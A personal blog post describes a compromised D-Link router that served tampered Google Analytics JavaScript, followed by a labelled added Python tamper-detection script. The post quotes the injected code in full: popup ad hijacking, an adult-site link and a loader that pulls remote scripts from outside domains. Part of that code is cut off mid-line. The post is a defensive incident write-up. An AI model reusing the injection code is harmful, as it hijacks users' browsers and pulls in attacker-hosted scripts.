
Malware in D-Link router was resulting in wrong Google Analytics JavaScript

March 9, 2015

Today I started to face some weird issues while browsing some sites. They started to pop up some spammy pages in new tabs. First I thought the site I was going to had malware.

But later on I saw that it was done by MITM'ing[1] the Google Analytics (GA) page. What I saw was that, on my computer and some other computers at home, when I tried to fetch the GA JavaScript below, it returned the following malware-infecting JS code instead, shown below.

Malware infecting Google Analytics JS

Content of http://www.google-analytics.com/ga.js:

Warning! Some NSFW sites in this injected JS. Careful with clicking!!

function setCookie(name, value, expires, path, domain, secure) {
  document.cookie = name + "=" + escape(value) +
    ((expires) ? "; expires=" + expires : "") +
    ((path) ? "; path=" + path : "") +
    ((domain) ? "; domain=" + domain : "") +
    ((secure) ? "; secure" : "");
};
function getCookie(name) {
  var cookie = " " + document.cookie;
  var search = " " + name + "=";
  var setStr = null;
  var offset = 0;
  var end = 0;
  if (cookie.length > 0) {
    offset = cookie.indexOf(search);
    if (offset != -1) {
      offset += search.length;
      end = cookie.indexOf(";", offset)
      if (end == -1) {
        end = cookie.length;
      }
      setStr = unescape(cookie.substring(offset, end));
    }
  }
  return(setStr);
};

var tmp = document.createElement('div');
tmp.setAttribute("align","center");
tmp.innerHTML = "http://adultube.info";;
var iframe = tmp.firstChild;
var body = document.getElementsByTagName('body')[0];
body.insertBefore(tmp, body.firstChild);

var params = "menubar=yes,location=yes,resizable=yes,scrollbars=yes,status=yes"
function PopShow3() {
  CookieTest=navigator.cookieEnabled;
  if(CookieTest)
  {
    ClickUndercookie = GetCookie('clickunder');
    if (ClickUndercookie == null)
    {
      var ExpDate = new Date ();
      ExpDate.setTime(ExpDate.getTime() + (24 * 60 * 60 * 1000));
      SetCookie('clickunder','1',ExpDate, "/");
      window.open("http://contentmovey.org/?hash=hg9umc", "Sex", params);
      window.focus();
    }
  }
}
function GetCookie (name) {
  var arg = name + "=";
  var alen = arg.length;
  var clen = document.cookie.length;
  var i = 0;
  while (i 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = name + "=" + escape (value) +
    ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
    ((path == null) ? "" : ("; path=" + path)) +
    ((domain == null) ? "" : ("; domain=" + domain)) +
    ((secure == true) ? "; secure" : "");
}
document.onmouseup=PopShow3;

(function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
    if (typeof w.document.body !== 'undefined') {
      script.src = 'http://sgwomxnntit.people-are-thought.info' + '/?973481=3ZTd24_LxcbKwsDN2pSYn5-fnJo';
      w.document.body.appendChild(script);
      clearInterval(i);
    }
  }, 200);
})(window);

(function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
    if (typeof w.document.body !== 'undefined') {
      script.src = 'http://clbspvpyukt.people-are-thought.info' + '/?446818=Fl8WEEQADg0BCQsGEV9TVFRUVVs';
      w.document.body.appendChild(script);
      clearInterval(i);
    }
  }, 200);
})(window);

If you look carefully, it references domains like adultube_dot_info.

Investigate and Fix:
When I used my phone's 3G Internet connection on the computer, this problem was not there. So that made me think the MITM was happening at my ISP (BSNL) or at my router.

I have two levels of routers. When I tried to open the admin page of my first-level router, it responded with 'Busy'. Just this text, nothing else. That caused suspicion. I rebooted it and the problem was gone.

Now I am worried whether it caused some permanent changes to my router. Obviously restoring the factory settings will fix that as well.
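The script below is an added example, not code from the post, from D-Link or from Google. It turns the comparison the author made by hand (fetch the same script through the home router, through the phone's 3G link and over HTTPS, then see which copy differs) into a function, scans a script body for the indicators visible in the injected copy above (references to hosts outside an allowlist, a window.open popup, a document.onmouseup handler, a setInterval-driven script loader), and computes a Subresource Integrity value for a trusted copy so a site that embeds the script can pin it with an integrity attribute (the browser only enforces it when the script is served with CORS headers). The sample bodies, the reserved .invalid placeholder hosts, the allowlist and the indicator patterns are constructed assumptions; the real ga.js is not reproduced.

```python
"""Added example: tamper checks for a third-party script such as ga.js.
The sample bodies, placeholder .invalid hosts, allowlist and indicator
patterns are constructed for this example; nothing here is Google's real
ga.js or code from the post."""
import base64
import hashlib
import hmac
import re

# Assumed allowlist of hosts a genuine copy of the script may reference.
ALLOWED_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com"}

# Heuristics drawn from the injected copy quoted in the post. A hit is a cue
# to diff the file against a trusted copy, not proof of tampering on its own.
SUSPICIOUS_PATTERNS = {
    "popup-window": re.compile(r"window\.open\s*\("),
    "click-hijack-handler": re.compile(r"document\.on(mouseup|mousedown|click)\s*="),
    "dynamic-script-loader": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "dom-injection": re.compile(r"\.innerHTML\s*="),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed stand-in for a clean copy (placeholder, not the real file).
CLEAN_GA_JS = "(function(){var _gaq=window._gaq||[];/* stand-in analytics code */})();"

# Constructed injected copy modelled on the script quoted in the post, with
# the malicious hosts replaced by reserved .invalid placeholders.
INJECTED_GA_JS = CLEAN_GA_JS + """
function PopShow3() {
  window.open("http://popup.example.invalid/?hash=PLACEHOLDER", "_blank", "menubar=yes");
}
document.onmouseup = PopShow3;
(function(w) {
  var script = document.createElement('script');
  var i = setInterval(function() {
    if (typeof w.document.body !== 'undefined') {
      script.src = 'http://loader.example.invalid' + '/?id=PLACEHOLDER';
      w.document.body.appendChild(script);
      clearInterval(i);
    }
  }, 200);
})(window);
"""


def referenced_hosts(body):
    """Every host named in an http(s) URL inside the script body."""
    return set(URL_HOST.findall(body))


def scan_script(body, allowed_hosts=ALLOWED_HOSTS):
    """Findings for one script body; an empty list means nothing looked injected."""
    findings = [f"unexpected-host:{h}" for h in sorted(referenced_hosts(body) - allowed_hosts)]
    findings += [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(body)]
    return findings


def sri_integrity(body):
    """Subresource Integrity value (sha384, base64) for a trusted copy of the script."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body.encode()).digest()).decode()


def verify_sri(body, integrity):
    """True when a fetched body still matches the pinned integrity value."""
    return hmac.compare_digest(sri_integrity(body), integrity)


def _sha256(body):
    return hashlib.sha256(body.encode()).hexdigest()


def divergent_paths(responses, reference):
    """Labels of fetch paths whose body differs from the reference path's body.

    `responses` maps a label (for example 'home-router-http', 'phone-3g-http',
    'https') to the body fetched that way; a path-local MITM shows up as the
    labels whose copy differs from the trusted one."""
    ref = _sha256(responses[reference])
    return sorted(label for label, body in responses.items() if _sha256(body) != ref)


if __name__ == "__main__":
    fetched = {"https": CLEAN_GA_JS, "phone-3g-http": CLEAN_GA_JS,
               "home-router-http": INJECTED_GA_JS}
    print("differs from HTTPS copy:", divergent_paths(fetched, "https"))
    print("indicators in router copy:", scan_script(INJECTED_GA_JS))
    print("router copy matches pinned SRI:",
          verify_sri(INJECTED_GA_JS, sri_integrity(CLEAN_GA_JS)))
```

To use this against live traffic, replace the constructed bodies with the responses fetched over each path (the HTTPS copy is the natural reference, since an HTTP-only injection cannot rewrite it) and keep the allowlist to the hosts the genuine script is known to reference.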

Cause & Further thoughts
I think the problem crept in because of us visiting some suspicious pages to download some music, and they installed some malware in the router. Apparently it is possible, as per this link.

This episode also made me think that all sites should move to HTTPS to prevent MITM.

Also, my phone's 3G is more secure, in that its "router" can't be corrupted by malware in this way. Also, the traffic over the air is encrypted, and the private keys of all the handsets, which are used to encrypt this, are only with the cell infra companies (or with the NSA!). So there!! But at least it is safe from normal malware sites.

[1] MITM: man-in-the-middle attack
